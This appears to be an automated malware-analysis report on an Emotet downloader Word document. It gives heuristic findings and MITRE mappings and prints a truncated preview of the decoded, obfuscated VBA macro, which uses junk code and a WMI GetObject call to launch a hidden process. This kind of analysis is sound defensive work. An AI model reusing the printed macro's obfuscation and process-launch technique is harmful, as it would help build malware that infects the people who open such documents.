MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865930-0', indicating it's likely part of the Emotet family. High-severity heuristics confirm the presence of an AutoOpen VBA macro that uses GetObject, a common technique for executing malicious code. The macro's obfuscated nature suggests it's designed to download and execute a second-stage payload, consistent with Emotet's behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865930-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865930-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43093 bytes |
SHA-256: 1049ad478935a16ad0ff33b7186a852f6dd2320f74eafbfdfe3dab09ec2b7aa3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "v290062"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "k655547"
Function Q50_1_65()
Select Case A_962_
Case 128000551
U310_1_9 = (o632_4 * Fix(451547558 / CBool(q26___))) - R821562 / Oct(892430490) / 798610692 + CStr(S49255_) - 919329677 + ChrB(o207____)
End Select
Select Case b3367648
Case 390220808
G675_5 = (A534_58 * Fix(100586583 / CBool(p67_12_))) - Y94____6 / Oct(941363895) / 274720910 + CStr(h2__95) - 962752476 + ChrB(w5619_)
End Select
Select Case N_19_8_7
Case 773858388
E1534__ = (F81__937 * Fix(966092511 / CBool(Z438__66))) - Z1537_ / Oct(18006073) / 735646295 + CStr(w079__4_) - 96629916 + ChrB(Y552___)
End Select
Select Case C8_330
Case 588431693
b___4818 = (d9224132 * Fix(174990940 / CBool(q0937894))) - U56296 / Oct(212369674) / 463336692 + CStr(n82_7_69) - 138569379 + ChrB(V_1_14_)
End Select
Select Case K__3_60
Case 83387527
z8_77_6 = (m20__66 * Fix(285742593 / CBool(n468_4))) - S4____81 / Oct(35424484) / 141128078 + CStr(d_8_26) - 525199804 + ChrB(o72_1_59)
End Select
Select Case K77_16_
Case 70757302
F54__61 = (A30395 * Fix(16570273 / CBool(h460__58))) - B__0_12 / Oct(80257334) / 664481382 + CStr(I14487) - 545313917 + ChrB(a12_61_7)
End Select
Select Case q_1075
Case 946927337
z2_91_ = (j3__8_38 * Fix(760523264 / CBool(F5_497))) - w_10_70_ / Oct(975429481) / 550262089 + CStr(U413053) - 265753525 + ChrB(J__0__1_)
End Select
End Function
Function j27125(K_20__, F_197_7)
On Error Resume Next
Select Case O01_164
Case 873956902
B___997 = (u00_6_70 * Fix(487417620 / CBool(B30040_))) - I532_5 / Oct(500809999) / 48936720 + CStr(j_271_) - 596153030 + ChrB(B90_647)
End Select
Select Case W7_130
Case 223897058
o0_9_9__ = (f_3796_ * Fix(761189105 / CBool(B23_4_5))) - t42879 / Oct(360385596) / 613036928 + CStr(c40_3_5) - 216577373 + ChrB(j6____0)
End Select
Select Case w__5_4
Case 750920478
U5479141 = (w532__8 * Fix(272730906 / CBool(X5327513))) - H343_746 / Oct(394406016) / 758842230 + CStr(T_8___2) - 381245754 + ChrB(w57132_5)
End Select
R_845_ = N5_1_6 + "winmgmts:Win32" + K_191_49 + "_ProcessStartup" + I26734_
Select Case s5_2467
Case 336586192
m035595 = (M__230 * Fix(173137779 / CBool(I__30_))) - b50737_ / Oct(99768988) / 965934274 + CStr(z0___43) - 826917769 + ChrB(j62_53)
End Select
Select Case X0735832
Case 311110205
D38_46 = (p357693 * Fix(163607865 / CBool(H3_8210))) - L57_93 / Oct(939019488) / 435634450 + CStr(c2176_0) - 159762297 + ChrB(c25093)
End Select
h495__94 = F8315_4 + "winmgmts:Win32" + l57398_ + "_Process" + l896_6
Select Case n_18_1
Case 899693318
z_04562 = (Q921__1 * Fix(310694814 / CBool(T59_0_0))) - P5____93 / Oct(917397212) / 228855129 + CStr(i_621_) - 763215146 + ChrB(Z0_761)
End Select
Select Case a3832_5
Case 634198281
r683_2_2 = (l_2852 * Fix(999227152 / CBool(M184668))) - U7_9_6 / Oct(200610008) / 137888759 + CStr(U_7_24) - 703922535 + ChrB(A_1_04)
End Select
Set j__258 = GetObject(R952_369 + R_845_ + P_2212)
Select Case B36666
Case 465359319
F_41_9 = (m4_065_1 * Fix(601377962 / CBool(V547_2))) - z5__97 / Oct(173020425) / 21945179 + CStr(B090_6) - 887111453 + ChrB(h_85_85)
End Select
Select Case l84_33
Case 486346972
q5_23_ = (P01523 * Fix(506262941 / CBool(j6_17__))) - Q_31__97 / Oct(954577258) / 897540014 + CStr(a9_5836) - 652356721 + ChrB(k_78211)
End Select
j__258.ShowWindow = z590_4 + 311833 - 311833 + l039_3
Select Case Q48__374
Case 645357063
h90659 = (i___09 * Fix(8181473 / CBool(T_361_))) - N_3_84 / Oct(104279817) / 702145494 + CStr(W03_696) - 311852797 + ChrB(Z_6_15_)
End Select
Select Case i__15_
Case 349205751
S_16417 = (P__145 * Fix(560709850
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.